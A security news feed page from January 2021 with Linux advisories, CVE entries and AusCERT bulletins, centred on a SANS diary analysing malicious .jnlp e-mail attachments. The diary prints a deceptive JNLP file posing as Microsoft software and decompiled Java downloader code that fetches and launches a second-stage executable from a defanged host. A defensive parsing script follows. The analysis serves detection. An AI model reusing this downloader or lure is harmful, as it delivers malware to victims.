News reader

Linux security Advisories · 22 January 2021

openSUSE: 2021:0138-1 moderate: opera

An update that fixes 13 vulnerabilities is now available.
Linux security Advisories · 22 January 2021

openSUSE: 2021:0139-1 moderate: opera

An update that fixes 13 vulnerabilities is now available.
Linux security Advisories · 22 January 2021

Gentoo: GLSA-202101-17: Dnsmasq: Multiple vulnerabilities

Multiple vulnerabilities have been found in Dnsmasq, the worst of which may allow remote attackers to execute arbitrary code.
Linux security Advisories · 22 January 2021

openSUSE: 2021:0136-1 moderate: ImageMagick

An update that fixes 35 vulnerabilities is now available.
NVD: all CVE · 22 January 2021

CVE-2021-22847

Hyweb HyCMS-J1's API fails to filter POST request parameters. Remote attackers can inject SQL syntax and execute commands without privileges.
NVD: all CVE · 22 January 2021

CVE-2021-22849

Hyweb HyCMS-J1's backend editing function does not filter special characters. Logged-in users can inject JavaScript syntax to perform a stored XSS (stored cross-site scripting) attack.
SANS · 22 January 2021

Another File Extension to Block in your MTA: .jnlp, (Fri, Jan 22nd)

When hunting, one thing that I like to learn is how imaginative attackers can be at deploying new techniques. I spotted some emails that had suspicious attachments based on the ‘.jnlp’ extension. I’m pretty sure that many people don’t know what their purpose is and, if you don’t know them, you don’t look for them in your logs, SIEM, etc. That makes them a good candidate to deliver malicious code!

Basically, a JNLP file[1] is... an XML file! It is written in the “Java Network Launching Protocol” format and contains all the information required to execute a Java program. Usually, it contains the address from which to download the applet (here, a malicious one) and the initial class to run.

I did a quick analysis of one of the captured JNLP files:

<?xml version="1.0" encoding="utf-8"?>
<jnlp spec="1.0+" codebase="hxxp://secured-doc-read[.]net" href="delivery.jnlp">
  <information>
    <title>Secure Document Reader</title>
    <vendor>Microsoft</vendor>
    <homepage href="wwww.microsoft.com"/>
    <description>Microsoft Secure Document Reader v.4.016</description>
  </information>
  <security>
    <all-permissions/>
  </security>
  <resources>
    <j2se version="1.6+" />
    <jar href="delivery.jar" />
  </resources>
  <application-desc main-class="Secure_Document_Reader">
  </application-desc>
  wghjs100570
</jnlp>

The syntax is easy to understand. The payload will be called ‘delivery.jar’ (line 14) and downloaded from secured-doc-read[.]net (line 2). The main class is ‘Secure_Document_Reader’ (line 16). Note the ‘all-permissions’ element (line 10): the applet asks to run outside the Java sandbox.

I decompiled the Jar file (SHA256:a4d95b7d196a4aca87cec384c5d21a756ab75cfaee7f4a20163d02109956a6dd)[2] and was surprised to find very simple code. Often, malicious Java applets implement a RAT, but here we faced the simple code of a downloader:

public class Secure_Document_Reader {
    static BufferedInputStream frisco415;
    static FileOutputStream friekiegee;
    static String linkage9;   // drop path of the second stage

    public static void main(final String[] array) {
        // Fetch the next stage, disguised as an image
        frisco415("hxxp://sec-doc-v[.]com/images/dsc0386234.jpg");
    }

    public static void frisco415(final String spec) {
        final File file = new File(Secure_Document_Reader.linkage9);
        try {
            // Stream the remote file to disk in 1 KB chunks
            Secure_Document_Reader.frisco415 = new BufferedInputStream(new URL(spec).openStream());
            Secure_Document_Reader.friekiegee = new FileOutputStream(Secure_Document_Reader.linkage9);
            final byte[] array = new byte[1024];
            int read;
            while ((read = Secure_Document_Reader.frisco415.read(array, 0, 1024)) != -1) {
                Secure_Document_Reader.friekiegee.write(array, 0, read);
            }
            Secure_Document_Reader.frisco415.close();
            Secure_Document_Reader.friekiegee.close();
        } catch (Exception ex) {}
        try {
            // Launch the dropped PE with the default handler
            Desktop.getDesktop().open(file);
        } catch (Exception ex2) {}
    }

    static {
        Secure_Document_Reader.frisco415 = null;
        Secure_Document_Reader.friekiegee = null;
        Secure_Document_Reader.linkage9 = "C:\\ProgramData\\videodrv.exe";
    }
}

The next stage is downloaded from hxxp://sec-doc-v[.]com/images/dsc0386234.jpg and dropped on disk as ‘videodrv.exe’. The PE file (SHA256:ceaf771da5e2678ed0d5844282bf0d464207c23842a8e36be3e7ab1df022ef89) has a VT score of 14/59[3].

Using .jnlp files is an effective way to bypass the first line of defenses (mail filters) because .jnlp files are text files and do not contain any executable code themselves. Note that Java must be installed on the victim's computer to handle .jnlp files.
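Because a .jnlp attachment is plain XML, a content-aware check has to parse it and look at what it would launch. The script below is an added example (not code from the diary or from SANS): it extracts the launch indicators walked through above (codebase, jar resources, main class, the all-permissions request) and turns them into findings a gateway rule or analyst can act on. The sample document is constructed for the example and uses a reserved .invalid hostname, not the infrastructure from the diary.

```python
"""Triage a JNLP e-mail attachment: parse the XML, extract what it would
launch and derive findings. For untrusted input in production, parse with
defusedxml rather than the stdlib parser."""
import xml.etree.ElementTree as ET
from urllib.parse import urljoin, urlparse

# Constructed sample modelled on the structure of the file discussed in the
# diary. The codebase host is a reserved .invalid name, not real infrastructure.
SAMPLE_JNLP = b"""<?xml version="1.0" encoding="utf-8"?>
<jnlp spec="1.0+" codebase="http://downloads.example.invalid" href="delivery.jnlp">
  <information>
    <title>Secure Document Reader</title>
    <vendor>Microsoft</vendor>
    <homepage href="www.microsoft.com"/>
  </information>
  <security><all-permissions/></security>
  <resources>
    <j2se version="1.6+"/>
    <jar href="delivery.jar"/>
  </resources>
  <application-desc main-class="Secure_Document_Reader"></application-desc>
  wghjs100570
</jnlp>"""


def _host(url: str) -> str:
    """Hostname of a URL, tolerating scheme-less values like 'www.example.com'."""
    if not url:
        return ""
    return urlparse(url if "//" in url else "//" + url).netloc.lower()


def _base_domain(host: str) -> str:
    """Last two labels of a hostname: enough to compare claimed vs actual origin."""
    return ".".join(host.split(".")[-2:])


def looks_like_jnlp(data: bytes) -> bool:
    """True if the bytes are XML with a <jnlp> root, whatever the attachment is named."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return False
    return root.tag.rsplit("}", 1)[-1] == "jnlp"


def analyze_jnlp(data: bytes) -> dict:
    """Extract launch indicators from a JNLP document and derive findings."""
    root = ET.fromstring(data)
    codebase = root.get("codebase", "")
    codebase_url = urlparse(codebase)
    homepage = root.find("information/homepage")
    homepage_href = homepage.get("href", "") if homepage is not None else ""
    # jar hrefs are relative to codebase: this is where the JVM fetches code from.
    jars = [urljoin(codebase.rstrip("/") + "/", j.get("href", "")) for j in root.iter("jar")]
    app = root.find("application-desc")
    main_class = app.get("main-class") if app is not None else None
    all_permissions = root.find("security/all-permissions") is not None
    # Text directly inside <jnlp>, outside any child element, means nothing to a
    # launcher; a generated file has no reason to carry it.
    stray_text = [t.strip() for t in [root.text, *(c.tail for c in root)] if t and t.strip()]

    findings = []
    if all_permissions:
        findings.append("requests <all-permissions/>: the jar would run outside the sandbox")
    if codebase_url.scheme == "http":
        findings.append(f"codebase {codebase_url.netloc} is fetched over plain HTTP")
    if homepage_href and codebase_url.netloc and \
            _base_domain(_host(homepage_href)) != _base_domain(codebase_url.netloc.lower()):
        findings.append(f"claimed homepage {homepage_href} does not match codebase {codebase_url.netloc}")
    if stray_text:
        findings.append(f"unexpected text inside <jnlp>: {stray_text}")

    return {
        "codebase_host": codebase_url.netloc,
        "jars": jars,
        "main_class": main_class,
        "all_permissions": all_permissions,
        "findings": findings,
        # Any jar launched from mail-borne XML is block-worthy; the findings
        # tell the recipient of the alert why.
        "verdict": "block" if jars or findings else "review",
    }


if __name__ == "__main__":
    report = analyze_jnlp(SAMPLE_JNLP)
    print(f"verdict: {report['verdict']} (main class {report['main_class']})")
    for jar in report["jars"]:
        print(f"  would fetch: {jar}")
    for finding in report["findings"]:
        print(f"  - {finding}")
```

Run `looks_like_jnlp` on every text attachment regardless of extension, since the filter is trivially bypassed by renaming the file.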

[1] https://fileinfo.com/extension/jnlp
[2] https://www.virustotal.com/gui/file/a4d95b7d196a4aca87cec384c5d21a756ab75cfaee7f4a20163d02109956a6dd/detection
[3] https://www.virustotal.com/gui/file/ceaf771da5e2678ed0d5844282bf0d464207c23842a8e36be3e7ab1df022ef89/detection

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
SANS · 22 January 2021

ISC Stormcast For Friday, January 22nd, 2021 https://isc.sans.edu/podcastdetail.html?id=7340, (Fri, Jan 22nd)

AusCERT - Security Bulletins · 22 January 2021

ASB-2021.0035 - [Win] Microsoft Edge (Chromium-based): Multiple vulnerabilities

AusCERT - Security Bulletins · 22 January 2021

ESB-2021.0269 - [Linux] IBM SDK Java Technology Edition for WebSphere Cast Iron Solution & App Connect Professional: Multiple vulnerabilities

===========================================================================
             AUSCERT External Security Bulletin Redistribution

                               ESB-2021.0269
   Security Bulletin: Vulnerabilities in IBM Java SDK affect IBM WebSphere
               Cast Iron Solution & App Connect Professional
                               22 January 2021

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           IBM SDK Java Technology Edition for WebSphere Cast Iron
                   Solution & App Connect Professional
Publisher:         IBM
Operating System:  Linux variants
Impact/Access:     Modify Arbitrary Files   -- Remote/Unauthenticated
                   Access Confidential Data -- Remote/Unauthenticated
Resolution:        Patch/Upgrade
CVE Names:         CVE-2020-2590
Reference:         ASB-2020.0028
                   ESB-2020.4463
                   ESB-2020.4416
                   ESB-2020.3230
                   ESB-2020.2824

Original Bulletin:
   https://www.ibm.com/support/pages/node/6406640

--------------------------BEGIN INCLUDED TEXT--------------------

Vulnerabilities in IBM Java SDK affect IBM WebSphere Cast Iron Solution &
App Connect Professional

Document Information
Document number     : 6406640
Modified date       : 21 January 2021
Product             : App Connect Professional
Component           : -
Software version    : -
Operating system(s) : Linux

Summary

Vulnerabilities in IBM SDK Java Technology Edition, used by IBM WebSphere
Cast Iron Solution & App Connect Professional. These issues were disclosed as
part of the IBM Java SDK updates in Jan 2020. IBM WebSphere Cast Iron
Solution & App Connect Professional has addressed the applicable CVEs.

Vulnerability Details

CVEID: CVE-2020-2590
DESCRIPTION: An unspecified vulnerability in Java SE related to the Java SE
Security component could allow an unauthenticated attacker to cause no
confidentiality impact, low integrity impact, and no availability impact.
CVSS Base score: 3.7
CVSS Temporal Score: See
https://exchange.xforce.ibmcloud.com/vulnerabilities/174538 for the current
score.
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N)

Affected Products and Versions

WebSphere Cast Iron v 7.5.0.0, 7.5.0.1, 7.5.1.0
WebSphere Cast Iron v 7.0.0.0, 7.0.0.1, 7.0.0.2
App Connect Professional v 7.5.2.0
App Connect Professional v 7.5.3.0
App Connect Professional v 7.5.4.0

Remediation/Fixes

+------------------------+-------+-------+---------------------+
|Product                 |VRMF   |APAR   |Remediation/First Fix|
+------------------------+-------+-------+---------------------+
|                        |7.0.0.0|       |                     |
|IBM WebSphere Cast Iron |7.0.0.1|LI81778|7002 Fixcentral Link |
|                        |7.0.0.2|       |                     |
+------------------------+-------+-------+---------------------+
|                        |7.5.0.0|       |                     |
|IBM WebSphere Cast Iron |7.5.0.1|LI81778|7510 fixcentral Link |
|                        |7.5.1.0|       |                     |
+------------------------+-------+-------+---------------------+
|App Connect Professional|7.5.2.0|LI81778|7520 Fixcentral link |
+------------------------+-------+-------+---------------------+
|App Connect Professional|7.5.3.0|LI81778|7530 Fixcentral link |
+------------------------+-------+-------+---------------------+
|App Connect Professional|7.5.4.0|LI81778|7540 Fixcentral link |
+------------------------+-------+-------+---------------------+

Workarounds and Mitigations

None

Change History

19 Jan 2021: Initial Publication

--------------------------END INCLUDED TEXT--------------------

You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to
auscert@auscert.org.au and we will forward your request to the appropriate
person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

        https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile:      (07) 3365 7031
Telephone:      (07) 3365 4417 (International: +61 7 3365 4417)
                AusCERT personnel answer during Queensland business hours
                which are GMT+10:00 (AEST).
                On call after hours for member emergencies only.
===========================================================================
AusCERT - Security Bulletins · 22 January 2021

ESB-2021.0268 - [SUSE] gdk-pixbuf: Denial of service - Remote with user interaction

===========================================================================
             AUSCERT External Security Bulletin Redistribution

                               ESB-2021.0268
                       Security update for gdk-pixbuf
                               22 January 2021

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           gdk-pixbuf
Publisher:         SUSE
Operating System:  SUSE
Impact/Access:     Denial of Service -- Remote with User Interaction
Resolution:        Patch/Upgrade
CVE Names:         CVE-2020-29385

Original Bulletin:
   https://www.suse.com/support/update/announcement/2021/suse-su-20210184-1

--------------------------BEGIN INCLUDED TEXT--------------------

SUSE Security Update: Security update for gdk-pixbuf
______________________________________________________________________________

Announcement ID:   SUSE-SU-2021:0184-1
Rating:            moderate
References:        #1174307 #1180393
Cross-References:  CVE-2020-29385
Affected Products: SUSE Linux Enterprise Module for Desktop Applications 15-SP2
                   SUSE Linux Enterprise Module for Basesystem 15-SP2
______________________________________________________________________________

An update that solves one vulnerability and has one errata is now available.

Description:

This update for gdk-pixbuf fixes the following issues:

  o CVE-2020-29385: Fixed an infinite loop in lzw.c in the function
    write_indexes (bsc#1180393).
  o Fixed an integer underflow in the GIF loader (bsc#1174307).

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation
methods like YaST online_update or "zypper patch".
Alternatively you can run the command listed for your product:

  o SUSE Linux Enterprise Module for Desktop Applications 15-SP2:
    zypper in -t patch SUSE-SLE-Module-Desktop-Applications-15-SP2-2021-184=1
  o SUSE Linux Enterprise Module for Basesystem 15-SP2:
    zypper in -t patch SUSE-SLE-Module-Basesystem-15-SP2-2021-184=1

Package List:

  o SUSE Linux Enterprise Module for Desktop Applications 15-SP2 (x86_64):
       gdk-pixbuf-debugsource-2.40.0-3.3.1
       gdk-pixbuf-query-loaders-32bit-2.40.0-3.3.1
       gdk-pixbuf-query-loaders-32bit-debuginfo-2.40.0-3.3.1
       libgdk_pixbuf-2_0-0-32bit-2.40.0-3.3.1
       libgdk_pixbuf-2_0-0-32bit-debuginfo-2.40.0-3.3.1
  o SUSE Linux Enterprise Module for Basesystem 15-SP2 (aarch64 ppc64le s390x x86_64):
       gdk-pixbuf-debugsource-2.40.0-3.3.1
       gdk-pixbuf-devel-2.40.0-3.3.1
       gdk-pixbuf-devel-debuginfo-2.40.0-3.3.1
       gdk-pixbuf-query-loaders-2.40.0-3.3.1
       gdk-pixbuf-query-loaders-debuginfo-2.40.0-3.3.1
       gdk-pixbuf-thumbnailer-2.40.0-3.3.1
       gdk-pixbuf-thumbnailer-debuginfo-2.40.0-3.3.1
       libgdk_pixbuf-2_0-0-2.40.0-3.3.1
       libgdk_pixbuf-2_0-0-debuginfo-2.40.0-3.3.1
       typelib-1_0-GdkPixbuf-2_0-2.40.0-3.3.1
       typelib-1_0-GdkPixdata-2_0-2.40.0-3.3.1
  o SUSE Linux Enterprise Module for Basesystem 15-SP2 (noarch):
       gdk-pixbuf-lang-2.40.0-3.3.1

References:

  o https://www.suse.com/security/cve/CVE-2020-29385.html
  o https://bugzilla.suse.com/1174307
  o https://bugzilla.suse.com/1180393

--------------------------END INCLUDED TEXT--------------------
AusCERT - Security Bulletins · 22 January 2021

ESB-2021.0267 - [SUSE] perl-Convert-ASN1: Denial of service - Remote/unauthenticated

===========================================================================
             AUSCERT External Security Bulletin Redistribution

                               ESB-2021.0267
                   Security update for perl-Convert-ASN1
                               22 January 2021

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           perl-Convert-ASN1
Publisher:         SUSE
Operating System:  SUSE
Impact/Access:     Denial of Service -- Remote/Unauthenticated
Resolution:        Patch/Upgrade
CVE Names:         CVE-2013-7488
Reference:         ESB-2021.0256

Original Bulletin:
   https://www.suse.com/support/update/announcement/2021/suse-su-20210183-1

--------------------------BEGIN INCLUDED TEXT--------------------

SUSE Security Update: Security update for perl-Convert-ASN1
______________________________________________________________________________

Announcement ID:   SUSE-SU-2021:0183-1
Rating:            moderate
References:        #1168934
Cross-References:  CVE-2013-7488
Affected Products: SUSE Linux Enterprise Module for Basesystem 15-SP2
                   SUSE Linux Enterprise Module for Basesystem 15-SP1
______________________________________________________________________________

An update that fixes one vulnerability is now available.

Description:

This update for perl-Convert-ASN1 fixes the following issue:

  o CVE-2013-7488: Fixed an infinite loop via unexpected input (bsc#1168934).

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation
methods like YaST online_update or "zypper patch".
Alternatively you can run the command listed for your product:

  o SUSE Linux Enterprise Module for Basesystem 15-SP2:
    zypper in -t patch SUSE-SLE-Module-Basesystem-15-SP2-2021-183=1
  o SUSE Linux Enterprise Module for Basesystem 15-SP1:
    zypper in -t patch SUSE-SLE-Module-Basesystem-15-SP1-2021-183=1

Package List:

  o SUSE Linux Enterprise Module for Basesystem 15-SP2 (noarch):
       perl-Convert-ASN1-0.27-1.6.2
  o SUSE Linux Enterprise Module for Basesystem 15-SP1 (noarch):
       perl-Convert-ASN1-0.27-1.6.2

References:

  o https://www.suse.com/security/cve/CVE-2013-7488.html
  o https://bugzilla.suse.com/1168934

--------------------------END INCLUDED TEXT--------------------
AusCERT - Security Bulletins · 22 January 2021

ESB-2021.0266 - [SUSE] samba: Multiple vulnerabilities

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 =========================================================================== AUSCERT External Security Bulletin Redistribution ESB-2021.0266 Security update for samba 22 January 2021 =========================================================================== AusCERT Security Bulletin Summary --------------------------------- Product: samba Publisher: SUSE Operating System: SUSE Impact/Access: Increased Privileges -- Existing Account Denial of Service -- Existing Account Access Confidential Data -- Existing Account Resolution: Patch/Upgrade CVE Names: CVE-2020-14383 CVE-2020-14323 CVE-2020-14318 Reference: ESB-2020.4436 ESB-2020.4143 ESB-2020.3755 Original Bulletin: https://www.suse.com/support/update/announcement/2021/suse-su-20210185-1 - --------------------------BEGIN INCLUDED TEXT-------------------- SUSE Security Update: Security update for samba ______________________________________________________________________________ Announcement ID: SUSE-SU-2021:0185-1 Rating: moderate References: #1173902 #1173994 #1177355 #1177613 #1178469 Cross-References: CVE-2020-14318 CVE-2020-14323 CVE-2020-14383 Affected Products: SUSE Enterprise Storage 7 ______________________________________________________________________________ An update that solves three vulnerabilities and has two fixes is now available. Description: This update for samba fixes the following issues: o Update to 4.13.3 + libcli: smb2: Never print length if smb2_signing_key_valid() fails for crypto blob; (bso#14210); + s3: modules: gluster. 
Fix the error I made in preventing talloc leaks from a function; (bso#14486); + s3: smbd: Don't overwrite contents of fsp->aio_requests[0] with NULL via TALLOC_FREE(); (bso#14515); + s3: spoolss: Make parameters in call to user_ok_token() match all other uses; (bso#14568); + s3: smbd: Quiet log messages from usershares for an unknown share; (bso#14590); + samba process does not honor max log size; (bso#14248); + vfs_zfsacl: Add missing inherited flag on hidden "magic" everyone@ ACE; (bso#14587); + s3-libads: Pass timeout to open_socket_out in ms; (bso#13124); + s3-vfs_glusterfs: Always disable write-behind translator; (bso#14486); + smbclient: Fix recursive mget; (bso#14517); + clitar: Use do_list()'s recursion in clitar.c; (bso#14581); + manpages/vfs_glusterfs: Mention silent skipping of write-behind translator; (bso#14486); + vfs_shadow_copy2: Preserve all open flags assuming ROFS; (bso#14573); + interface: Fix if_index is not parsed correctly; (bso#14514); o Update to 4.13.2 + s3: modules: vfs_glusterfs: Fix leak of char **lines onto mem_ctx on return; (bso#14486); + RN: vfs_zfsacl: Only grant DELETE_CHILD if ACL tag is special; (bso#14471); + smb.conf.5: Add clarification how configuration changes reflected by Samba; (bso#14538); + daemons: Report status to systemd even when running in foreground; (bso# 14552); + DNS Resolver: Support both dnspython before and after 2.0.0; (bso #14553); + s3-vfs_glusterfs: Refuse connection when write-behind xlator is present; (bso#14486); + provision: Add support for BIND 9.16.x; (bso# 14487); + ctdb-common: Avoid aliasing errors during code optimization; (bso #14537); + libndr: Avoid assigning duplicate versions to symbols; (bso# 14541); + docs: Fix default value of spoolss:architecture; (bso#14522); + winbind: Fix a memleak; (bso#14388); + s4:dsdb:acl_read: Implement "List Object" mode feature; (bso#14531); + docs-xml/manpages: Add warning about write-behind translator for vfs_glusterfs; (bso#14486); + nsswitch/ nsstest.c: 
Avoid nss function conflicts with glibc nss.h. + vfs_shadow_copy2: Avoid closing snapsdir twice; (bso#14530); + third_party: Update resolv_wrapper to version 1.1.7; (bso#14547); + examples:auth: Do not install example plugin; (bso#14550); + ctdb-recoverd: Drop unnecessary and broken code; (bso#14513); + RN: vfs_zfsacl: Only grant DELETE_CHILD if ACL tag is special; (bso#14471); o Adjust smbcacls '--propagate-inheritance' feature to align with upstream; (bsc#1178469). o Update to samba 4.13.1 + CVE-2020-14383: An authenticated user can crash the DCE/RPC DNS with easily crafted records; (bsc#1177613); (bso#14472); + CVE-2020-14323: Unprivileged user can crash winbind; (bsc#1173994); (bso# 14436); + CVE-2020-14318: Missing handle permissions check in SMB1/2/3 ChangeNotify; (bsc#1173902); (bso#14434); o Adjust systemd tmpfiles.d configuration, use /run/samba instead of /var/run /samba; (bsc#1177355); Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". 
Alternatively you can run the command listed for your product: o SUSE Enterprise Storage 7: zypper in -t patch SUSE-Storage-7-2021-185=1 Package List: o SUSE Enterprise Storage 7 (aarch64 x86_64): ctdb-4.13.3+git.181.fc4672a5b81-3.3.1 ctdb-debuginfo-4.13.3+git.181.fc4672a5b81-3.3.1 libdcerpc-binding0-4.13.3+git.181.fc4672a5b81-3.3.1 libdcerpc-binding0-debuginfo-4.13.3+git.181.fc4672a5b81-3.3.1 libdcerpc0-4.13.3+git.181.fc4672a5b81-3.3.1 libdcerpc0-debuginfo-4.13.3+git.181.fc4672a5b81-3.3.1 libndr-krb5pac0-4.13.3+git.181.fc4672a5b81-3.3.1 libndr-krb5pac0-debuginfo-4.13.3+git.181.fc4672a5b81-3.3.1 libndr-nbt0-4.13.3+git.181.fc4672a5b81-3.3.1 libndr-nbt0-debuginfo-4.13.3+git.181.fc4672a5b81-3.3.1 libndr-standard0-4.13.3+git.181.fc4672a5b81-3.3.1 libndr-standard0-debuginfo-4.13.3+git.181.fc4672a5b81-3.3.1 libndr1-4.13.3+git.181.fc4672a5b81-3.3.1 libndr1-debuginfo-4.13.3+git.181.fc4672a5b81-3.3.1 libnetapi0-4.13.3+git.181.fc4672a5b81-3.3.1 libnetapi0-debuginfo-4.13.3+git.181.fc4672a5b81-3.3.1 libsamba-credentials0-4.13.3+git.181.fc4672a5b81-3.3.1 libsamba-credentials0-debuginfo-4.13.3+git.181.fc4672a5b81-3.3.1 libsamba-errors0-4.13.3+git.181.fc4672a5b81-3.3.1 libsamba-errors0-debuginfo-4.13.3+git.181.fc4672a5b81-3.3.1 libsamba-hostconfig0-4.13.3+git.181.fc4672a5b81-3.3.1 libsamba-hostconfig0-debuginfo-4.13.3+git.181.fc4672a5b81-3.3.1 libsamba-passdb0-4.13.3+git.181.fc4672a5b81-3.3.1 libsamba-passdb0-debuginfo-4.13.3+git.181.fc4672a5b81-3.3.1 libsamba-util0-4.13.3+git.181.fc4672a5b81-3.3.1 libsamba-util0-debuginfo-4.13.3+git.181.fc4672a5b81-3.3.1 libsamdb0-4.13.3+git.181.fc4672a5b81-3.3.1 libsamdb0-debuginfo-4.13.3+git.181.fc4672a5b81-3.3.1 libsmbclient0-4.13.3+git.181.fc4672a5b81-3.3.1 libsmbclient0-debuginfo-4.13.3+git.181.fc4672a5b81-3.3.1 libsmbconf0-4.13.3+git.181.fc4672a5b81-3.3.1 libsmbconf0-debuginfo-4.13.3+git.181.fc4672a5b81-3.3.1 libsmbldap2-4.13.3+git.181.fc4672a5b81-3.3.1 libsmbldap2-debuginfo-4.13.3+git.181.fc4672a5b81-3.3.1 
libtevent-util0-4.13.3+git.181.fc4672a5b81-3.3.1 libtevent-util0-debuginfo-4.13.3+git.181.fc4672a5b81-3.3.1 libwbclient0-4.13.3+git.181.fc4672a5b81-3.3.1 libwbclient0-debuginfo-4.13.3+git.181.fc4672a5b81-3.3.1 samba-4.13.3+git.181.fc4672a5b81-3.3.1 samba-ceph-4.13.3+git.181.fc4672a5b81-3.3.1 samba-ceph-debuginfo-4.13.3+git.181.fc4672a5b81-3.3.1 samba-client-4.13.3+git.181.fc4672a5b81-3.3.1 samba-client-debuginfo-4.13.3+git.181.fc4672a5b81-3.3.1 samba-debuginfo-4.13.3+git.181.fc4672a5b81-3.3.1 samba-debugsource-4.13.3+git.181.fc4672a5b81-3.3.1 samba-libs-4.13.3+git.181.fc4672a5b81-3.3.1 samba-libs-debuginfo-4.13.3+git.181.fc4672a5b81-3.3.1 samba-libs-python3-4.13.3+git.181.fc4672a5b81-3.3.1 samba-libs-python3-debuginfo-4.13.3+git.181.fc4672a5b81-3.3.1 samba-winbind-4.13.3+git.181.fc4672a5b81-3.3.1 samba-winbind-debuginfo-4.13.3+git.181.fc4672a5b81-3.3.1 References: o https://www.suse.com/security/cve/CVE-2020-14318.html o https://www.suse.com/security/cve/CVE-2020-14323.html o https://www.suse.com/security/cve/CVE-2020-14383.html o https://bugzilla.suse.com/1173902 o https://bugzilla.suse.com/1173994 o https://bugzilla.suse.com/1177355 o https://bugzilla.suse.com/1177613 o https://bugzilla.suse.com/1178469 - --------------------------END INCLUDED TEXT-------------------- You have received this e-mail bulletin as a result of your organisation's registration with AusCERT. The mailing list you are subscribed to is maintained within your organisation, so if you do not wish to continue receiving these bulletins you should contact your local IT manager. If you do not know who that is, please send an email to auscert@auscert.org.au and we will forward your request to the appropriate person. NOTE: Third Party Rights This security bulletin is provided as a service to AusCERT's members. As AusCERT did not write the document quoted above, AusCERT has had no control over its content. 
The decision to follow or act on information or advice contained in this
security bulletin is the responsibility of each user or organisation, and
should be considered in accordance with your organisation's site policies
and procedures. AusCERT takes no responsibility for consequences which may
arise from following or acting on information or advice contained in this
security bulletin.

NOTE: This is only the original release of the security bulletin. It may not
be updated when updates to the original are made. If downloading at a later
date, it is recommended that the bulletin is retrieved directly from the
author's website to ensure that the information is still current.

Contact information for the authors of the original document is included in
the Security Bulletin above. If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

        https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile:      (07) 3365 7031
Telephone:      (07) 3365 4417 (International: +61 7 3365 4417)
                AusCERT personnel answer during Queensland business hours
                which are GMT+10:00 (AEST).
                On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967

iQIVAwUBYApb9uNLKJtyKPYoAQjb/Q//cDlXYWjhH9EpxbO7+Au91orwWdOZgzGW
2CVEFXxk2dSG+z2lMtDl/tj2+Ni9hir8Fr6mkoOdJtnnHswrc1F0KcIf9mw5LExH
hLuUV5mE4fOZwIM9RMlx05mZDLgLQceEXt18k1mi6aP1mLdR8Q7Ii8Dl0gdNoiwT
IxXWfoGFFZipQ4lPmnk5k8YFs2Q4qNDGuY+rtwOiTMC3y2oMWhedHARwFagxg69b
iBirMXfVOQB75gzHpx+UaHk7QT5pNBHVQg4+viOC6Wzt54XCoigECGUhWSO7R2Bt
OShUoFQd9cjYV7KslJYa9GgD9Y73//4HC8l86Wz8Wy8q0ai0T4u560m8vxCYj1N9
bKD5NlcgcWL6zEyDuVW1LtcRcE3XkaPRyRpDVoPzQyyq5GWe3GN915GxhRyMy9Sk
o4kYQsSesxUgHbC8/0xTjP/4uvVE4nvkltttarGHB3oHRYK3P1NgY2kBUscZyR8f
tUldz4Go+2kXetp7EikVJiAkPfLla88u3+29imuScR3K6OuIqfjyqridAqvJaBzi
vtrtq4VK34zmWxErO/77KnWvE7kwNvSVR1+A6iKhFiQSdQK0RisGZ2QzIUst7goD
DcZEva3ABLMZ6LaXkGRn7XjfmISa9yW5aczTfYex1UVyhMjRWrbwqP45v0XvHiMu
O2qLgxgmNow=
=DowE
-----END PGP SIGNATURE-----
AusCERT - Security Bulletins · 22 January 2021

ESB-2021.0265 - [SUSE] yast2-multipath: Overwrite arbitrary files - Existing account

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

===========================================================================
             AUSCERT External Security Bulletin Redistribution

                               ESB-2021.0265
                    Security update for yast2-multipath
                              22 January 2021

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           yast2-multipath
Publisher:         SUSE
Operating System:  SUSE
Impact/Access:     Overwrite Arbitrary Files -- Existing Account
Resolution:        Patch/Upgrade
CVE Names:         CVE-2018-17955
Reference:         ESB-2020.3912

Original Bulletin:
   https://www.suse.com/support/update/announcement/2021/suse-su-20210182-1

- --------------------------BEGIN INCLUDED TEXT--------------------

SUSE Security Update: Security update for yast2-multipath
______________________________________________________________________________

Announcement ID:   SUSE-SU-2021:0182-1
Rating:            moderate
References:        #1026027 #1117592
Cross-References:  CVE-2018-17955
Affected Products: SUSE Linux Enterprise High Availability 12-SP2
______________________________________________________________________________

An update that solves one vulnerability and has one errata is now available.

Description:

This update for yast2-multipath to version 3.1.9 fixes the following issues:

Security issue fixed:
